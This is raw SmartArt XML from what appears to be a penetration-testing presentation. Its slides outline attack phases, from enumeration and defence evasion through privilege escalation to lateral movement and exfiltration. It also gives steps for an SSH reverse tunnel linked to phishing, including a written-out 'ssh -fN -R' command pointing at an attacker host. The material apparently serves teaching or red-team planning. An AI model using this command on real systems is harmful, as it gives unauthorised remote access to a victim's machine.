        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0219221C-8E6F-4FD8-9625-C01038D07592}" type="sibTrans" cxnId="{5620A755-B279-4AA8-8673-490B354953C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B99A003F-B644-4E80-8620-2A9A0AA19437}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Make a throwaway account on your attacking machine (SSHD Server) with the permissions of /bin/false, preventing third parties from compromising the connection.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{717C12AB-F8EB-4561-9BF3-203E1769939F}" type="parTrans" cxnId="{2CBE1B23-FC39-4FA6-8F4A-EB7D955EBA21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FC0FFD3-639A-46DF-AF2E-2626EB0DFDF1}" type="sibTrans" cxnId="{2CBE1B23-FC39-4FA6-8F4A-EB7D955EBA21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CABFB267-17F8-4B3E-97BE-969895354E11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Generate keypair</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63EF1415-9E83-489E-AE65-EDB2B11EC5C6}" type="parTrans" cxnId="{E5EC7D2D-AE71-41CB-B560-E83BBA6169FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9CA0705-A6F6-4A17-AAD2-6A428B53B6F2}" type="sibTrans" cxnId="{E5EC7D2D-AE71-41CB-B560-E83BBA6169FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF04592C-E2AD-4766-9599-03CE3E589B13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Make SSH key access available on attacking machine to automate SSH key access when executing any phishing attacks and generate new keypair on target environment.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9B5EDD1-76BE-474E-BA43-7C03EEA885B7}" type="parTrans" cxnId="{CCADB1FA-35FC-478A-9798-253F29740374}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2FDEB54-89F6-43E1-B67D-A183A293A1B0}" type="sibTrans" cxnId="{CCADB1FA-35FC-478A-9798-253F29740374}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Establish Reverse Shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70DD7E99-2B90-4E24-B28B-68497DC2A4FE}" type="parTrans" cxnId="{8FFFFA8A-6AF6-40FE-8BED-2B539A16FC54}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA7FCE35-06DD-4013-8FF3-966B4FEAB60B}" type="sibTrans" cxnId="{8FFFFA8A-6AF6-40FE-8BED-2B539A16FC54}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD9A681A-75B9-4D23-9F24-DDDDE1832288}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Generate new keypair on target environment and establish a reverse shell using: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>ssh</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>fN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> –R 2200:127.0.0.1:22 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>throwaway-account@IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>  –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>i</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>id_rsa</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E3118B-4836-423D-8F41-8B351755210F}" type="parTrans" cxnId="{02F85292-2BAF-4ABD-8BD6-23C42A506546}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEE93F3B-5E80-407B-B1F5-C942F46A7E7C}" type="sibTrans" cxnId="{02F85292-2BAF-4ABD-8BD6-23C42A506546}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" type="pres">
      <dgm:prSet presAssocID="{467055C0-55D4-4323-8816-EE2A09F153A2}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" type="pres">
      <dgm:prSet presAssocID="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93E966A8-19A2-4944-ADFA-258A5672E961}" type="pres">
      <dgm:prSet presAssocID="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" presName="parentTextBox" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}" type="pres">
      <dgm:prSet presAssocID="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" presName="descendantBox" presStyleLbl="bgAccFollowNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82815C55-6F18-4013-B11B-3697CEDF8970}" type="pres">
      <dgm:prSet presAssocID="{E9CA0705-A6F6-4A17-AAD2-6A428B53B6F2}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D966D8F-A4BC-4371-82FB-17003FDFA3F0}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{75D4DB8A-44BC-4202-B8E1-B84504161224}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="arrow" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}" type="pres">
      <dgm:prSet presAssocID="{CABFB267-17F8-4B3E-97BE-969895354E11}" presName="descendantArrow" presStyleLbl="bgAccFollowNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{500AAF0D-8DA9-4D32-9608-DF9086C0C0AC}" type="pres">
      <dgm:prSet presAssocID="{0219221C-8E6F-4FD8-9625-C01038D07592}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{114BFECD-0BD4-4027-B68F-A29BB5636D70}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="arrow" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F4618C8-3311-455B-84E8-E531E4625D69}" type="pres">
      <dgm:prSet presAssocID="{B32A1EAF-FF8D-457B-898B-059F4925F381}" presName="descendantArrow" presStyleLbl="bgAccFollowNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2CBE1B23-FC39-4FA6-8F4A-EB7D955EBA21}" srcId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" destId="{B99A003F-B644-4E80-8620-2A9A0AA19437}" srcOrd="0" destOrd="0" parTransId="{717C12AB-F8EB-4561-9BF3-203E1769939F}" sibTransId="{6FC0FFD3-639A-46DF-AF2E-2626EB0DFDF1}"/>
    <dgm:cxn modelId="{E5EC7D2D-AE71-41CB-B560-E83BBA6169FC}" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{CABFB267-17F8-4B3E-97BE-969895354E11}" srcOrd="1" destOrd="0" parTransId="{63EF1415-9E83-489E-AE65-EDB2B11EC5C6}" sibTransId="{E9CA0705-A6F6-4A17-AAD2-6A428B53B6F2}"/>
    <dgm:cxn modelId="{5620A755-B279-4AA8-8673-490B354953C7}" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" srcOrd="0" destOrd="0" parTransId="{8C8F84A6-6706-4638-B6B1-A6B1FD3A5CC9}" sibTransId="{0219221C-8E6F-4FD8-9625-C01038D07592}"/>
    <dgm:cxn modelId="{C94FAF59-0A2C-49D6-9046-341D7B818324}" type="presOf" srcId="{CD9A681A-75B9-4D23-9F24-DDDDE1832288}" destId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{B4D87D7B-4D5A-4640-820B-0A9B0A940CED}" type="presOf" srcId="{CABFB267-17F8-4B3E-97BE-969895354E11}" destId="{75D4DB8A-44BC-4202-B8E1-B84504161224}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{8FFFFA8A-6AF6-40FE-8BED-2B539A16FC54}" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" srcOrd="2" destOrd="0" parTransId="{70DD7E99-2B90-4E24-B28B-68497DC2A4FE}" sibTransId="{AA7FCE35-06DD-4013-8FF3-966B4FEAB60B}"/>
    <dgm:cxn modelId="{2E8EDC8F-7A91-4BBF-90C6-FEA0EF015088}" type="presOf" srcId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" destId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{02F85292-2BAF-4ABD-8BD6-23C42A506546}" srcId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" destId="{CD9A681A-75B9-4D23-9F24-DDDDE1832288}" srcOrd="0" destOrd="0" parTransId="{06E3118B-4836-423D-8F41-8B351755210F}" sibTransId="{BEE93F3B-5E80-407B-B1F5-C942F46A7E7C}"/>
    <dgm:cxn modelId="{F27C7BA5-6AB9-4F52-90E8-5B4A209E8EC0}" type="presOf" srcId="{467055C0-55D4-4323-8816-EE2A09F153A2}" destId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{93B863B9-0AC5-477E-9513-AD40B8D8BB09}" type="presOf" srcId="{CABFB267-17F8-4B3E-97BE-969895354E11}" destId="{6D966D8F-A4BC-4371-82FB-17003FDFA3F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{61FEB9C2-8D20-40C5-91A5-3B133E8D84CC}" type="presOf" srcId="{B32A1EAF-FF8D-457B-898B-059F4925F381}" destId="{114BFECD-0BD4-4027-B68F-A29BB5636D70}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{B144F9CF-BF16-441B-8065-A0AAEA0207C0}" type="presOf" srcId="{B99A003F-B644-4E80-8620-2A9A0AA19437}" destId="{7F4618C8-3311-455B-84E8-E531E4625D69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{49238BDE-F368-4D87-B65B-56A6F5D30AFE}" type="presOf" srcId="{FF04592C-E2AD-4766-9599-03CE3E589B13}" destId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{5EAD12F2-BAD5-42A0-B1F0-2CA6F7F87F19}" type="presOf" srcId="{9DC8EC2B-620E-4387-9E3F-4FF648F18658}" destId="{93E966A8-19A2-4944-ADFA-258A5672E961}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{CCADB1FA-35FC-478A-9798-253F29740374}" srcId="{CABFB267-17F8-4B3E-97BE-969895354E11}" destId="{FF04592C-E2AD-4766-9599-03CE3E589B13}" srcOrd="0" destOrd="0" parTransId="{B9B5EDD1-76BE-474E-BA43-7C03EEA885B7}" sibTransId="{A2FDEB54-89F6-43E1-B67D-A183A293A1B0}"/>
    <dgm:cxn modelId="{9008072C-B380-4CCE-9155-CE232C83ADDF}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F7857B50-166F-425C-BA1F-35BE6588BE81}" type="presParOf" srcId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" destId="{93E966A8-19A2-4944-ADFA-258A5672E961}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{899DEC35-2A78-47E2-87DD-BB7897A37C27}" type="presParOf" srcId="{16FFDEB6-0DB8-4478-BBD3-B99A5E91816C}" destId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{6C1D3FB0-C81F-4F78-9C01-A5C5E5881E02}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{82815C55-6F18-4013-B11B-3697CEDF8970}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F516A42F-7E01-4127-AB51-D8C27183F5A2}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{D1A0E5CC-40F5-463F-900B-36493E348B20}" type="presParOf" srcId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" destId="{6D966D8F-A4BC-4371-82FB-17003FDFA3F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{475EE872-CDCD-4B9B-9295-B2B640341487}" type="presParOf" srcId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" destId="{75D4DB8A-44BC-4202-B8E1-B84504161224}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{D4EFC8DD-7627-452E-A8E9-2FCCE073739C}" type="presParOf" srcId="{7FA1275F-4AB9-46E0-BE73-63F1C15967D7}" destId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{276BD8B3-3682-4972-A56C-BF132A7863F3}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{500AAF0D-8DA9-4D32-9608-DF9086C0C0AC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{A115221C-53BF-4255-9F7C-D0D16CD576D8}" type="presParOf" srcId="{63C275FA-9F27-4E54-9CCD-C2DA3A2BC1D6}" destId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F3FBCBA5-376A-40B5-841C-12883C660159}" type="presParOf" srcId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" destId="{114BFECD-0BD4-4027-B68F-A29BB5636D70}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{F55B1C59-029D-4246-B963-3460B992D398}" type="presParOf" srcId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" destId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess"/>
    <dgm:cxn modelId="{1ABBD09D-E6AC-480E-A878-C1D7F10CDB2A}" type="presParOf" srcId="{68DEBC19-1517-4671-9B54-994C6E6C7639}" destId="{7F4618C8-3311-455B-84E8-E531E4625D69}"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305232-84BA-4227-AD08-C8DB50105805}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful5" csCatId="colorful"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81CD59E7-5704-4176-B626-8FE068BB09A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>1. Gaining access, host discovery and initial port scanning. (Enumeration) (20% Recon)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83CE10C3-76BF-4715-A7B3-43C32043A404}" type="parTrans" cxnId="{EC091A7E-A84D-4819-9B47-85E7A2ABAEC2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F28B243-8953-4C0C-A850-FC1B9FC23014}" type="sibTrans" cxnId="{EC091A7E-A84D-4819-9B47-85E7A2ABAEC2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B6FBD30-B68E-42EA-BDF2-6D4CEA56FC7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>2. Enumerating the ports, gathering deeper information on our target. (Further Enumeration) (20% Recon)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E912C6B-0182-413E-93F0-BF806409B471}" type="parTrans" cxnId="{6EC24042-88FC-439C-BA9B-67C27918866D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1AEECD56-29BF-4BD1-9090-B02E6AA85C92}" type="sibTrans" cxnId="{6EC24042-88FC-439C-BA9B-67C27918866D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4419167-9A32-406A-84A4-91B96EDB89C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>3. Attempt to evade any defences. (Defence Evasion) (20% Recon/10% Exploitation)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B733EA8-7316-495E-8526-D3D9C3AC152E}" type="parTrans" cxnId="{F41CDB7A-3E91-4BC9-9991-99B36764675B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9450CCCE-9FEF-4176-9438-5B9F19E0F7BC}" type="sibTrans" cxnId="{F41CDB7A-3E91-4BC9-9991-99B36764675B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F099BF88-91E3-40A1-A98A-844E8AD720C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>4. Attempt to escalate privileges within our beachhead machine. (40% Exploitation)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{116C45A4-EDA4-40EF-BF8E-8DBD286F66DA}" type="parTrans" cxnId="{2EC57176-CCE3-4673-91B3-306047C126FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CB8D9EF-4DB0-4F67-BF33-EBB2735B536E}" type="sibTrans" cxnId="{2EC57176-CCE3-4673-91B3-306047C126FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5CA560D-47A9-4517-A604-89D6141AADE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>5. Attempt lateral movement to deeper subnets and exfiltrate information (Post-exploitation) (20% Recon)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED9B381B-B987-44F4-AF21-7BA320EBE684}" type="parTrans" cxnId="{C2602E8A-09BC-4009-B8D1-F14ED94BE98D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51731C32-C4C1-453C-AB73-D3199E5A37A3}" type="sibTrans" cxnId="{C2602E8A-09BC-4009-B8D1-F14ED94BE98D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" type="pres">
      <dgm:prSet presAssocID="{11305232-84BA-4227-AD08-C8DB50105805}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8437356-5A2E-4971-9BEC-D61C7C1473B7}" type="pres">
      <dgm:prSet presAssocID="{81CD59E7-5704-4176-B626-8FE068BB09A3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6754B2F4-DD2F-4E46-88F8-3B543245138A}" type="pres">
      <dgm:prSet presAssocID="{4F28B243-8953-4C0C-A850-FC1B9FC23014}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{990D55F0-1518-4522-8611-910C20D69969}" type="pres">
